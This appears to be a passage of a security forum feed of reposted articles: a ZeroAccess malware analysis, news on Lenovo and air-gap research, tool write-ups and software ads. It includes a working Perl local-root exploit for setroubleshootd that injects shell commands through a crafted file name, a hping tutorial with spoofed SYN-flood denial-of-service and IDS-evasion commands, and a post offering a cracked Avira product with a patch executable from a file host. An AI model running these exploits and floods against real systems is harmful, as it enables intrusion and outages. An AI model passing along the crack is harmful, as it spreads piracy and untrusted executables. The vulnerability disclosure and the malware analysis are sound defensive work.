this case, the malware was downloaded intentionally for analysis. As in all analysis, the first step is to isolate the affected system. After this, the entire system is scanned for malicious content. At first glance, nothing concrete was found, but on further analysis a file is found in the %TEMP%directory of the infected workstation. An another suspicious file is also found within the %SYSTEM% directory on the workstation. This file appeared to be a configuration file of some kind, and it was protected using ACL permissions. The executable is extracted and run on a sandbox and comes up with confirmation of network indicators. The results also clearly indicate that the file was the dropper component for the Zero Access trojan. The name of the file is found to be fvshis.sav, and the contents of the file are encrypted. The strings of the executable were extracted from the memory and several artifacts were found that confirmed that the dropper received was the 32 bit version of the Max++ dropper component. Later, the dropper component of the trojan was analyzed, and at first glance the file appears to be unpacked. owever, during static analysis it is found that the file is packed using a complex custom packer. The executable also employs a complex anti-debugging scheme to further complicate analysis. The INT 2 signal is an operating system interrupt that allows the program to be debugger aware, i.e the program can detect if it is being analyzed by a debugger and kill itself. This can hinder analysis of such executables. The packing scheme employed by this particular trojan is also very complex, as it makes use of several layers of crypting and packing. It is found that the dropper component makes use of a complex packing scheme. The unpacking scheme works in chunks, with each chunk having a line of anti-debugging code. The dropper will continue to unpack itself in this manner until the entire file has been unpacked. If an analyst tries to break into the cycle with a debugger, the executable will crash the debugger. On much greater efforts, the sample was unpacked, and it was found that the sample attempts to access several directories on the host computer. From the usage of the INT 2 instruction in the code, we realize that the sample is a Ring zero rootkit, i.e it runs in kernel mode. Memory analysis was done on the sample and found that it creates a Mutex in memory. Such Mutexes are used by malware to ensure that the system is not re-infected with the same sample again. It is found that the trojan has injected itself into a legitimate process (explorer.exe) and is using this process to execute its payload. Later, kernel mode artifacts in memory were looked for, and it was found that the malware sample has hidden itself in the system as a kernel module. The trojan disguises itself as a device driver in the kernel memory. The driver is called B48DADF8.sys. Dump this module for further analysis. During preliminary analysis, the suspicious network traffic leaving the infected system was found, and this is analyzed in greater detail. HTTP requests to one domain in particular are also seen. The dropper is clearly trying to contact the above domain to download other malware samples into the infected system, and the domain name was analyzed. The resolved C&C IP address appears to be in Zurich, Switzerland. Swiss law protects the privacy of its citizens to a great extent. This makes it a very popular location for bulletproof hosting providers. Bulletproof hosting is very popular with cybercriminals for hosting their C&C servers. Further analysis into the domain shows that the domain actually maps to 3 different IP addresses including the one given above. All of the domains are in locations with strong privacy laws. We found that all three IP addresses have been blacklisted as malicious: 141.8.225.62 (Switzerland) 199.79.60.109 (Cayman Islands) 208.91.196.109 (Cayman Islands) Although this particular trojan does not steal user information, we found that it generates a large amount of traffic from its click fraud and Bitcoin mining modules. Recommendations Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world. Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application. Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack. Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files. Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media. Do not click suspicious advertisements and banners while browsing the web. Make use of log analysis tools (SIEM) for greater visibility against file and network changes within your organization. Ensure that your antivirus solution is up to date with the latest virus definitions. Ensure that your systems are up to date with the latest available patches, particularly the following vulnerabilities, as this trojan makes use of them to infect systems. CVE-2006-0003 CVE-2008-2992 CVE-2009-0927 CVE-2009-1671 CVE-2009-1672 CVE-2009-4324 CVE-2010-1885 Ensure that your organization uses email gateways to filter spam messages and mails with malicious attachments. Do not click on links in email from unknown sources Do not allow any P2P file sharing software in your corporate network environment. Block traffic to the following addresses in your perimeter devices such as Firewalls and IDS/IPS solutions. 141.8.225.62 208.91.196.109 199.79.60.109 References www.symantec.com Source
  10. HARDWARE FIRM Lenovo has been accused of offering its customers another free bonus security threat just weeks after the Superfish scandal. The firm has already fixed the problem, but the news, and its description as another "massive security risk", isn't good. Superfish was a scandal for the firm and affected a lot of its hardware. Lenovo disabled the software and took any associated financial losses on the chin. Ultimately, the firm said that it had failed its customers. "We recognise that the software did not meet that goal and have acted quickly and decisively. We are providing support on our forums for any user with concerns," Lenovo said at the time. "Our goal is to find technologies that best serve users. In this case, we have responded quickly to negative feedback and taken decisive actions to ensure that we address these concerns." Today we asked the firm to comment on the findings of IOActive Lab researchers who accused it of major vulnerabilities and a system that enables the creation and exploitation of fake credentials and the handing over of system control. IOActive Lab said in a security report (PDF) that the problem has been fixed, but that it had granted attackers the same kind of access as a system update, and allowed for the execution of code. Attackers could exploit an flaw in Lenovo's certificate authority methods, and use it to sign off their own executables which could have a range of capabilities. "Local and potentially remote attackers can bypass signature validation checks and replace trusted Lenovo applications with malicious applications," said the advisory. "These applications will then be run as a privileged user. The System Update downloads executables from the internet and runs them. "Remote attackers who can perform a man-in-the-middle attack can exploit this to swap Lenovo's executables with a malicious executable. "The System Update uses TLS/SSL to secure its communications with the update server, which should protect against [such] attacks. "In a statement Lenovo told the INQUIRER that it worked with the security firm after it was notified and patched the problem in April. It added that it appreciates the assistance, explaining that its update fixed all issues. "Lenovo's development and security teams worked directly with IOActive regarding their System Update vulnerability findings, and we value their expertise in identifying and responsibly reporting them," it said. "Lenovo released an updated version of System Update which resolves these vulnerabilities and subsequently published a security advisory in coordination with IOActive. Lenovo recommends that all users update System Update to eliminate the vulnerabilities reported by IOActive." Source
  11. cryptmount is a utility for GNU/Linux operating systems which allows an ordinary user to mount an encrypted filing system without requiring superuser privileges. It is aimed at recent Linux systems using the 2.6 kernel series. There are currently two main approaches to using encrypted filesystems within the linux kernel: the cryptoloop device driver; the device-mapper system, using the dm-crypt target. The (older) cryptoloop system has grown in parallel with the loopback device-driver of 2.4 kernel series, but has now been superseded by the device-mapper capabilities of the 2.6 kernel series. The newer devmapper system offers a cleaner organization of encryption and device-access, and superior performance has been noted. Alternative user-space tools which allow individual files to be encrypted are also widely available, but allow some information about file sizes & organization to be exposed. With the older cryptoloop system, it was possible to describe all the details of an encrypted filesystem within /etc/fstab so that it could be configured completely by 'mount'. This meant that it was particularly easy to give any user permission to mount those encrypted filesystems simply by providing the 'user' option within /etc/fstab. With the newer device-mapper infrastructure, there are more stages involved in mounting an encrypted filing system, and neither does 'mount' currently allow this nor does the syntax of /etc/fstab lend itself to describing all the necessary filesystem parameters. This is especially so if the filesystem is stored in an ordinary file, which would require separate configuration of a loopback device and a devmapper target before the filesystem could be accessed. cryptmount was written to make it as easy for ordinary users to access encrypted filesystems on-demand using the newer devmapper mechansism as it was to use the older, now deprecated, cryptoloop methods. This offers the following advantages: access to improved functionality in the kernel transparent support for filesystems stored on either raw disk partitions or loopback files separate encryption of filesystem access keys, allowing access passwords to be changed without re-encrypting the entire filesystem storing multiple encrypted filesystems within a single disk partition, using a designated subset of blocks for each rarely used filesystems do not need to be mounted at system startup un-mounting of each filesystem is locked so that this can only be performed by the user that mounted it, or the superuser encrypted filesystems compatible with cryptsetup encrypted access-keys can be chosen to be compatible with openssl, or managed via libgcrypt, or (for 2.0 release-series) built-in SHA1/Blowfish ciphers support for encrypted swap partitions (superuser only) support for setting up encrypted filesystems or crypto-swap at system boot-up Link: cryptmount.sourceforge.net
  12. Avira System Speedup 1.6.2.120 + Patch.rar ----------------------- Avira System Speedup is A Comprehensive, full-Featured software tool That Will help you to keep your system free of all unnecessary files. Junk files, obsolete registry entries, temporary files, Web history, traces and logs ... they only take up too much of your computer's valuable space, slow down its performance and are a constant threat to your privacy. This fast and efficient tool can get rid of them all in a snap. System Speedup comes wrapped up in an attractive and well-structured interface. Together with a first section that offers you statistical information about your system, the program's main set of tools is divided into two big groups - System Cleaner and System Optimizer. All scanning Processes are Performed at High Speed, Producing clear and Detailed results. Salient Features Deep scan Disk Doctor to the Rescue Customize or Automate Process Manager Monitor Driver Disk Analyzer Registry Cleaner & Junk File Startup Manager Uninstaller System Optimizer Disk Wiper Smart Defragmenter & many more ... Steps To Get Full Version Download and install Avira System Speedup Close Program after first Run avirasystemspeedup_patch.exe Open and Click Patch button That's All, you are done !! Enjoy https://www.sendspace.com/file/mqmhcs
  13. Angajam Linux System Administrator in Bucuresti. Program L-V 8-17 Salariu negociabil Cei interesati imi pot trimite cv-urile in privat, sau la email hackyard@yahoo.com
  14. Packet crafting is the art of creating a packet according to various requirements to carry out attacks and to exploit vulnerabilities in a network. It’s mainly used to penetrate into a network’s structure. There are various vulnerability assessment tools used to craft such packets. As a coin has two sides, these tools could be used by hackers to find the vulnerabilities of a targeted system. Crafting is technically advanced and a complex type of vulnerability exploitation, and it’s difficult to detect and diagnose. Steps Involved in Packet Crafting The idea behind crafting is to try to simulate an attack and to identify the properties of a network. They are commonly used to invade firewalls and intrusion detection software. The following are the steps involved in packet crafting: Packet Assembly: This is the first step involved in packet crafting. In this process, the attacker selects the network to be cracked, collects the possible vulnerability information and creates the packet. The packet should be designed in such a way that it should be invisible while passing through a network. For example, for a packet to be invisible, the source address could be spoofed before sending it to a network. Packet Editing: In this step, the packets are tested before sending. The packets are edited in such a way that maximum information could be retrieved by injecting a minimum number of packets. Packet Playing: When the packets are ready, packet playing sends them to the targeted machine and collects the resultant packets for further analysis. If the required information is not obtained, the attacker again moves to the editing phase to modify the packet to obtain the required result. Packet Analysis: The sent packets are received by the attacker and they are analyzed to extract the information. Various sniffing tools like Wireshark, tcpdump, dsniff, etc. are used for this purpose. This step gives a route to the targeted system, or at least gives attackers enough data to tune up the attack. Tools For Packet Crafting: Hping, Nemesis, Netcat, Scapy, Socat Let’s carry out a test to understand the creation and working of a crafted packet and its effect on a firewall. Test Requirements Two Machines (One with Hping and Other with Snort installed). Working connection between two machines. Hping This is a utility that helps us to assemble and send ICMP, UDP or TCP packets and then display the results. It’s similar to the ping command, but it offers far more options to customize the packet to be sent. This helps to map the firewall set rules of a targeted system. Snort Sort is a free network intrusion detection and prevention software. It helps us to carry out real time traffic analysis packet logging, protocol analysis, content searching, etc. on a network. Testing Figure 1: Packet Crafting test setup Now we are going to check how a packet can be crafted from a system using Hping, and how it can be customized to be invisible in a network. We are using Snort as the IDS in the target machine. This could prove that packet crafting is a serious issue that should be studied to prevent attacks. Firstly install Hping on the source machine. It’s a command line multi-platform software. We are using two Linux machines for the test. The installation package could be downloaded from various websites. The next step is to install the intrusion detection software at the destination end. Download the latest version Snort with Winpcap and install it on the machine. Winpcap is a driver that helps in collecting packets. After setting up two machines, establish a connection between the two machines to transfer the packets. Check the connection before sending the packets. These are the steps to setup the test environment. Now we have to craft the packet using Hping. In Hping there are various arguments to modify the packet to be sent according to the requirement. These could be obtained from the manual page of Hping. Before sending the packet, determine the address of the target machine. Here it is 192.168.0.10. Now write the command for packet creation. Hping is a command line software. For creating the packets, the commands should be given in a perfect way so that the packet penetrates into the targeted system without being detected. An example is given below: hping 192.168.0.10 –udp –spoof 192.168.1.150 The packets are sent to the UDP port of machine 192.168.0.10 with a spoofed source IP of 192.168.1.150. Figure 2: Spoofing to UDP port. Figure 3: Spoofed address on target system hiding original address Packet crafting could be used to carry out DOS attacks to a targeted machine. This could be done by flooding packets to a predetermined port. The number of packets reaching the port is beyond the managing capacity of that port. This results in the failure of the system and finally becomes non-responsive to any request made to that particular system. Port Scanning Before sending a packet to the system Hping could be used to carry out a port scan. This helps the attacker to get the information on available open ports to carry out attack easily. The weakest port is selected to gain access to the system. hping3 -S 192.168.0.10 -p 80 -c 2 This command scans port number 80 of machine with IP 192.168.0.10. There are even commands to scan the complete ports in a machine. This will give the attacker the complete status of the ports in a system. hping 192.168.0.10 –S -p 22 –rand-source –flood This command floods the port number 22 of the mentioned machine. As the flooding starts, the machine becomes non responsive. When the flooding is stopped, the machine comes back to its normal state. Figure 4: Command for flooding a machine Figure 5: Result displayed by Snort after flooding. We can see from the above image that a large number of packets have been dumped to the targeted machine within a small amount of time. The IDS software does not detect the packets while the flooding is in process. But as soon as the flooding is stopped, Snort displays only the number of packets received. The traffic created by flooding the packets cannot be handled by the system and becomes non-responsive. No Signatures are generated during the process. DNS and ICMP Packet Crafting Domain Name System is the system responsible for resolving domain names. DNS uses ports 53 UDP for normal operations and can enlist port 53 TCP for zone transfers and other oversized replies. Once the address is entered into the URL, the browser will try to resolve the IP. If the address is not known, then a DNS request will be sent to the DNS server configured on the client. We could craft such a packet using Hping so that the firewall does not block the packet. hping -2 –p 53 -E data.dns -d 31 192.168.0.10 Here the packet is sent to the port number 53 of the target (192.168.0.10), with the packet containing a file called “data.dns”. The packet size has also been specified as 31. Figure 6: Sending a file to target’s DNS port When sending a data file through Hping, the IDS used in the target’s machine does not detect the presence of the attached file. It only displays the total number of packets transmitted and received. Even tough it shows unreachable, the packets are received at the target location. Hping can also be used to send ICMP (Internet Control Message Protocol) packets. ICMP packets are usually used to troubleshoot networks and for gathering basic information. These packets could be used to check whether a host is alive or not. In most of the firewalls, packets like ICMP and DNS request have the ability to pass by. These crafted ICMP packets helps us to pass through the firewall. At the senders end, we have to specify the type of packet, destination and other details for proper communication. hping 192.168.0.11 –d 100 –icmp –file /data.dns Here the file “data.dns” is sent to the target 192.168.0.11 using an ICMP packet. Figure 7: File sent using ICMP packet Using such crafted packets, a traffic firewall could be breached. From the above test, we can agree to the fact that packet crafting is a serious issue that should be taken care of. References Snort: 5 Steps to Install and Configure Snort on Linux LINUX HELP ALL: INSTALLING AND CONFIGURING SNORT ON REDHAT/CENTOS v5.5 Cyber Attacks Explained: Packet Crafting - Open Source For You Article : Cyber Security Packet crafting : Ethical Hacking Penetration Test Pune,India - Valency Networks Tools for creating TCP/IP packets | Linux Blog http://www.securitybistro.com/?p=8881 Source
  15. setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain). In util.py we have: 266 def get_rpm_nvr_by_file_path_temporary(name): 267 if name is None or not os.path.exists(name): 268 return None 269 270 nvr = None 271 try: 272 import commands 273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name) 274 if rc == 0: 275 nvr = output 276 except: 277 syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name) 278 return nvr (and other similar occurences) So. Yes, thats correct: The SELinux system that is only there to protect you, passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html) inside a daemon running as root. Sacken lassen... I attached a PoC which uses networkmanager's openvpn plugin to execute arbitraty commands by triggering an access violation to a pathname which contains shell commands. The setroubleshootd_t domain has quite a lot of allowed rules and transitions, so this can clearly count as privilege escalation. Furthermore a lot of admins run their system in permissive mode (full root) even when its shipped enforcing by default. Also note that there are potentially remote vectors, if attackers can control part of the filenames being created (web uploads, git, scp, ftp etc). Sebastian PS: I am all for SELinux but theres something on the wrong way. I counted the LOC, and the core SELinux (kernel) has a smaller codebase than whats framed around in python, running as root and mangling attacker controlled input. IOW, the system that wants to protect you has fewer code enforcing the rules than code that potentially blows up your system. And that code is python, so let alone all the python modules and interpreter hat can have bugs on its own. Driving such a lane _can only lead to abyss_. And I am not saying that evil powers are creating an overly complex system to better hide their bugdoors within. PPS: bug-logo will follow -- ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer () suse de - SuSE Security Team #!/usr/bin/perl # # Fedora21 setroubleshootd local root PoC # # (C) 2015 Sebastian Krahmer # # - requires polkit authorization to add/mod VPN connections # to NetworkManager (default on desktop user) # - after execution of this script, which adds appropriate # NM connection entries, try # # $ nmcli c up vpn-FOOBAR # # a couple of times, until you see: # # logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:... # # in the journalctl logs # # PS: I know in advance what the SELinux developers will say... # # I say: lulz! # create a pathname that setroubleshootd will eventually # query sh -c { rpm -qf ... with, fucking up ' escaping. So the # embedded pathname is then evaluated as command # # There goes your NSA-grade SELinux security!!! $file = "/tmp/foo.pem';`id|logger`;echo '"; open(O, ">", $file) or die $!; close O; # add connection system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn"); open(O,"|nmcli c edit vpn-FOOBAR") or die $!; print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\n"; print O "set vpn.secrets password=1\nsave\nquit\n"; close(O); print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n"; Source
  16. The Innovative Technology Partnerships Office at NASA's Goddard Space Flight Center in Greenbelt, Maryland, announced the release of its core Flight System (cFS) Application Suite to the public. The cFS application suite is composed of 12 individual Command and Data Handling (C&DH) flight software applications that together create a reusable library of common C&DH functions. The cFS application suite allows developers to rapidly configure and deploy a significant portion of the C&DH software system for new missions, test platforms and prototypes, resulting in reduced schedule and cost. The cFS framework takes advantage of a rich heritage of successful NASA Goddard flight software efforts and addresses the challenges of rapidly increasing software development costs and schedules due to constant changes and advancements in hardware. Flight software complexity is expected to increase dramatically in coming years and the cFS provides a means to manage the growth and accommodate changes in flight system designs. The cFS is currently being used by the Core Observatory of NASA’s Global Precipitation Measurement (GPM) mission, launched on Feb. 27, 2014, from Tanegashima Space Center in Japan, and it has also been used by NASA's Ames Research Center in Moffett Field, California, on their most recent mission, the NASA Lunar Atmosphere and Dust Environment Explorer (LADEE), which launched Sept. 6, 2013. Other centers such as NASA's Marshall Space Flight Center in Huntsville, Alabama, NASA's Glenn Research Center in Cleveland, Ohio, and NASA's Johnson Space Center in Houston are currently using the cFS as well. The core Flight Executive (cFE) and the Operating System Abstraction Library (OSAL) are two cFS components previously released as open source. These two components provide a platform-independent application runtime environment. The 12 applications in this release provide C&DH functionality common to most spacecraft Flight Software (FSW) systems. This means the current suite of cFS open source applications now provide a complete FSW system including a layered architecture with user-selectable and configurable features. These architectural features coupled with an implementation targeted for embedded software platforms makes the cFS suitable for reuse on any number of flight projects and/or embedded software systems at very significant cost savings. Each component in the system is a separate loadable file and are available to download free of cost at the links listed in the table. The complete cFS software suite will fully support the cFS user community and future generations of cFS spacecraft platforms and configurations. The cFS community expects the number of reusable applications to continue to grow as the user community expands. here we go -> NASA Goddard Releases Open Source Core Flight Software System Application Suite to Public | NASA
  17. tudents from M.I.T. have devised a new and more efficient way to scour raw code for integer overflows, the troublesome programming bugs that serve as a popular exploit vector for attackers and often lead to the crashing of systems. Researchers from the school’s Computer Science and Artificial Intelligence Laboratory (CSAIL) last week debuted the platform dubbed DIODE, short for Directed Integer Overflow Detection. As part of an experiment, the researchers tested DIODE on code from five different open source applications. While the system was able to generate inputs that triggered three integer overflows that were previously known, the system also found 11 new errors. Four of the 11 overflows the team found are apparently still lingering in the wild, but the developers of those apps have been informed and CSAIL is awaiting confirmation of fixes. Integer overflows result when computers can’t store numbers – usually because they haven’t been sanity checked – in the memory that’s been allocated for them. Sanity checks are simple queries to test functionality. The seven researchers behind DIODE – Stelios Sidiroglou-Douskos, Eric Lahtinen, Nathan Rittenhouse, Paolo Piselli, Fan Long, Deokhwan Kim, and Martin Rinard – presented the system last week at the 20th ASPLOS (Architectural Support for Programming Languages and Operating Systems) conference in Istanbul. The tool works by automatically generating inputs that trigger overflow errors at critical sites. DIODE, which is compatible with off-the-shelf x86 binaries, gets right to work and extracts target expressions and branch conditions for each memory allocation site. As Stelios Sidiroglou-Douskos, a research scientist at CSAIL and the lead author of the paper writes, whenever DIODE stumbles upon an integer that may be used in a dangerous operation, the system records the current state of the symbolic expression. The system doesn’t trigger an overflow right off the bat, but characterizes the values around it to better inform the programmer. If DIODE finds a trigger value, it marks it down to help in any future debugging. DIODE’s inputs should identify, then satisfy the requisite sanity checks and “generate an overflow in the target expression, and impose no other constraints on the specific path that the input takes to trigger the overflow,” according to Sidiroglou-Douskos. DIODE, which was supported on behalf of a DARPA grant, isn’t the first debugging tool developed to dig up integer overflows. Researchers with CSAIL previously developed static analysis tools that, like SIFT (.PDF) which points out inputs that can lead to overflow errors and KINT, (.PDF) a PHP tool. As the team’s academic paper points out however, unlike SIFT, which requires direct access to source code, DIODE works directly with stripped x86 code. The tool also bests KINT, which often generates a large number of false positives, by omitting false positives. M.I.T. hopes to release DIODE to the public as open source after the program it’s being developed under, DARPA’s Mission-oriented Resilient Clouds (MRC) program, concludes in October 2015. Source
  18. Initially identified fifteen years ago, and clearly articulated by a Microsoft Security Advisory, DLL hijacking is the practice of having a vulnerable application load a malicious library (allowing for the execution of arbitrary code), rather than the legitimate library by placing it at a preferential location as dictated by the Dynamic-Link Library Search Order which is a pre-defined standard on how Microsoft Windows searches for a DLL when the path has not been specified by the developer. Despite published advice on secure development practices to mitigate this threat, being available for several years, this still remains a problem today and is an ideal place for malicious code to hide and persist, as well as taking advantage of the security context of the loading program. How can DLL hijacking be detected? Okay - so it's up to the developers to be more secure in the way they load their libraries, but in the meanwhile how can we detect whether our systems have been compromised in this way? To achieve this I have been experimenting with a new methodology (well, at least it's new to me!) for detecting active attacks of this nature on vulnerable systems, and have written a program which does the following: 1. Iterate through each running process on the system, identifying all the DLLs which they have loaded 2. For each DLL, inspect all the locations where a malicious DLL could be placed 3. If a DLL with the same name appears in multiple locations in the search order, perform an analysis based on which location is currently loaded and highlight the possibility of a hijack to the user 4. Additionally: Check each DLL to see whether it has been digitally signed, and give the user the option to ignore all signed DLLs During testing I have found that DLL hijacking isn't always malicious, infact there are a whole bunch of digitally signed libraries which sit in the base directory of an application (perhaps they act differently to their generic counterparts?). Accordingly, in order to reduce the amount of noise returned by the tool, I implemented the '/unsigned' parameter, which I would recommend you use the first time you run it. This ignores cases where both the DLL which has actually been loaded, and others found in the search order are all signed (and therefore, more likely to be legit) - if you want to dig deep, feel free to leave this off! By default, the tool will only display the results where the library being examined was loaded from one of the 'DLL search order' paths, as otherwise it implies it was safely loaded from an alternative location. Unfortunately, this excludes the 'Current Working Directory' (due to a lack of an API to retrieve this data and undocumented internal memory structure changes between versions). If you want to override this you can, with the /verbose option (realistically, in conjunction with /unsigned to reduce the noise). This would be useful if you are looking for 'remote system, current working directory' style attacks as this displays entries with multiple potential DLLs irrespective of where it was loaded from. Demonstration of tool in action To test the tool, I created a vulnerable executable which does a single action: LoadLibrary(L"dll_hijack_test_dll.dll");. This sits alongside the associated DLL which, on being loaded, writes a message to the screen and sleeps forever to keep the program running. I put the DLL in two locations on the system: The path to the executable The Windows System directory (C:\Windows\System32) This now represents a common DLL hijacking attack in which the attacker would place the malicious DLL in the directory the program is launched from, which would be searched before the Windows System directory (where in this case, the legitimate DLL would be). Image 1. The demo program running with the DLL loaded The image above shows the demo running and the properties page from Process Hacker, which shows the DLL as being loaded. At this point we run dll_hijack_detect.exe, which produces the following result: Image 2. Output from dll_hijack_detect.exe on demo system Video demonstration As we can see, it has successfully identified the hijack and informed the user! Sound great! Where can I download a copy? I have release the source code and binaries, all of which are available from my github. In addition you will find a copy of the dll_hijack_test executable and DLL, so you can try it out for yourself! Source
  19. Product Description The biggest nightmare for a computer user is data loss and system crash, once happened, reliable and up-to-date backups are extremely necessary and important. DAYU Disk Master covers all the needs to recover your lost data and restore crashed systems in minutes. It’s advanced and reliable data backup & system disaster recovery software for home office and business desktops and laptops. It enables users to perform self-service backup operation with comprehensive RAM disk The RAM disk allows you to create a single RAM disk using available physical memory from Windows. The RAM disk can appear to Windows as a hard disk, as a removable-media disk, or as a virtual disk. It can be formatted with any Windows-supported file system. An important feature is that the RAM disk it creates is available to the system very early in system startup. Therefore, any applications or services that depend on the RAM disk can access it as soon as they start. Keep your temporary files in the fastest storage to get the highest performance, and forget about hard disk fragmentation caused by undeleted temporary files. The RAM disk can improve overall system performance. The temporary files frequently accessed by system or other application, and the read and write the RAM memory speeds far greater than the real hard disk, so the RAM disk can improve overall system performance; additional hard disk, and SSD storage medium has its read and write times limit, the RAM disk improve the life of a real hard disk too. Secure disk Secure disk is a compact program for creating on-the-fly-encrypted virtual disks. It helps you protect your sensitive files or data from unauthorized access with strong Encryptions. You can create a new volume which reside in a file, and mount it as a virtual disk. File operations on the virtual disk just like they are on any normal disk. Files that are being written/ read on virtual disk are automatically being encrypted/ decrypted on-the-fly, without any user intervention. Deduplication The use of advanced data deduplication technology, more efficient, smaller image files generated. full/differential/incremental backup. Key Features: System backup and protection (imaging) Full, incremental, and differential backup AES 256 bit encryption, compression, and password One-click system backup Daily, weekly or monthly backup scheduler Perfect Defrag Bare-metal system restore Backup Strategy(Quota management) Supports all sizes hard disks and SSDs (80GB to 4TB) Compression Deduplication Hot Clone Larger than 512-byte sector GPT & UEFI Boot Supported RAM disk The RAM disk can improve overall system performance. The temporary files frequently accessed by system or other application, and the read and write the RAM memory speeds far greater than the real hard disk, so the RAM disk can improve overall system performance; additional hard disk, and SSD storage medium has its read and write times limit, the RAM disk improve the life of a real hard disk too. Save RAM disk data to the file. One key to set the temporary directory to the RAM disk. When the system starts, the application automatically load the RAM disk. Virtual disk (Secure disk) The virtual disk utility simulates a real HDD in order to avoid data loss and to facilitate a more comfortable software testing environment. The secure disk is a compact program for creating on-the-fly-encrypted virtual disks. It helps you protect your sensitive files or data from unauthorized access with strong Encryptions. Password protection – using AES encryption technology. Deduplication – make a image file smaller. Splitting – splits disk image files. Format it – automatically create partitions and format. Support larger than 512-byte sector. Simulate real hard disk over 2TB+. Disk Backup Flexibly choose entire hard drive or separate partitions to backup, including dynamic disk volumes. The system partition will be selected by default at the first time, so one-click back up Windows, settings, applications and the files required for computer to boot. Password protection – using AES encryption technology. Compression – compressed backup data takes up less storage space. Deduplication – make a backup image smaller. Splitting – splits disk image files. Support larger than 512-byte sector. Support real hard disk over 2TB+. Full, incremental, and differential backups. Sector-by-sector backup – store an exact copy of your disk or volume, including unused space, sector-by-sector backup assures you a 100% identical copy to the original. Schedule backups – set up a schedule to back up your system and all files automatically, supporting daily, weekly, and monthly. Backup Strategy– automatically delete the obsolete backup images based on specified value – the age and the number. System backup – Full system protection allows you to easily back up and recover your entire operating system when disaster happens. Disk Recovery Return your computer’s system files and programs to an earlier state when everything was working properly. System restore – Quickly recover your entire Windows system backup in minutes to the original or new location using a PE bootable media. Data restore – Quickly recover your entire disk or parstition backup in minutes to the original or new location. System migration – Fast, easy and safely migrate system to a SSD without reinstalling windows. Pre-OS recovery environment – If your system won’t boot, simply select DAYU Disk Master from boot menu to launch Pre-OS and then recover your system. Disk Clone Fast, easily and safely migrate system to an SSD or a bigger HDD for disk replacement or upgrade. Backup system – Create an exact duplication of your system or data partition, and transfer it to another place. System migration – Fast, easy and safely migrate system to a SSD without reinstalling windows. Hot Clone – You can clone the current system is running to another location. Advanced Tools Backup management – Easily manage (view, edit, update, delete) backup job and automatically delete the out-of-date backup images, saving storage space. Mount – You can even mount disk image as a drive in read-only mode and then copy out files/folders from it. Check image – Check integrity of image file and make sure the backups can be restored successfully. Create emergency disk – Create a WinPE-based bootable media in case of emergency, especially for system restore. Log reporting – Record and view backup task names and operations for the PCs. Hard disk health – Checks the hard disk health status by using SMART and Temperature display and view hard disk detailed information. Disk move/resize – Modify the location and capacity of the target partition. -> Download <-Deal Expire in:
  20. Product Description Easy Backup Software for Laptops and PCs A reliable and easy-to-use backup software for home users to back up photos, music, videos, documents, emails, etc. Affordable yet Powerful – fast, safe and easy, only 50% of the price of competitors. Easy to Install and Simple to Use – intuitive interface guiding you step-by-step. Recommended by many famous websites – wins a lot of awards from PC World, Cnet, Softpedia, ToptenREVIEWS, etc. Reliable and Secure – back up any crucial data and protect them in a safe way. It is an advanced and reliable data backup & system disaster recovery software for home desktops and laptops. It enables users to perform backup operation oriented on complete system & file backup to fully protect important data with comprehensive differential/incremental backup and fast system snapshot. Backup Features Backup system – one-click system backup. Back up entire system state (operation system and installed applications) on-the-fly without interrupting Windows work. Backup all files – network shared files, specified files & folders and different kinds of file types can be full or selectively backed up. Outlook backup and restore – backs up of all your email messages in Outlook and save them in a safe way, so you always can access them, especially when you accidentally delete emails. Backup certain file type in specified folder – allows you to specify one file type to backup in certain folder, avoiding monotonous and boring manual efforts. Add Network-attached storage – just one time to add Network – attached Storage (NAS) as the destination, and enjoy the convenience of easy backup process forever. New! Backup data including contacts, messages, call logs, documents, music, photos, videos in Android device. Recovery Benefit Specified file recovery – Directly recover individual files from disk/partition backup image, no need to recover the whole image for saving much disk space and time. System migration – fast, easy and safely migrate system to a SSD without reinstalling windows. System Snapshot – take a snapshot of the current system for fast system recovery from crashed/failed system. Disk & partition recovery – fast recover the whole hard disk, partition, dynamic volume or GPT disk to original or different hardware to upgrade & migrate hard disk. New! Recover data including contacts, messages, call logs, documents, music, photos, videos in Android device. Special Benefits Copy to cloud for double protection of data. Clone disk for hard drive upgrade (GPT disk included). Explore backup image file in Windows Explorer. Automatically delete old images to save disk space. -> Download <-Deal Expire in:
  21. AIR-GAPPED SYSTEMS, WHICH are isolated from the Internet and are not connected to other systems that are connected to the Internet, are used in situations that demand high security because they make siphoning data from them difficult. Air-gapped systems are used in classified military networks, the payment networks that process credit and debit card transactions for retailers, and in industrial control systems that operate critical infrastructure. Even journalists use them to prevent intruders from remotely accessing sensitive data. To siphon data from an air-gapped system generally requires physical access to the machine, using removable media like a USB flash drive or a firewire cable to connect the air-gapped system directly to another computer. But security researchers at Ben Gurion University in Israel have found a way to retrieve data from an air-gapped computer using only heat emissions and a computer’s built-in thermal sensors. The method would allow attackers to surreptitiously siphon passwords or security keys from a protected system and transmit the data to an internet-connected system that’s in close proximity and that the attackers control. They could also use the internet-connected system to send malicious commands to the air-gapped system using the same heat and sensor technique. In a video demonstration produced by the researchers, they show how they were able to send a command from one computer to an adjacent air-gapped machine to re-position a missile-launch toy the air-gapped system controlled. The proof-of-concept attack requires both systems to first be compromised with malware. And currently, the attack allows for just eight bits of data to be reliably transmitted over an hour—a rate that is sufficient for an attacker to transmit brief commands or siphon a password or secret key but not large amounts of data. It also works only if the air-gapped system is within 40 centimeters 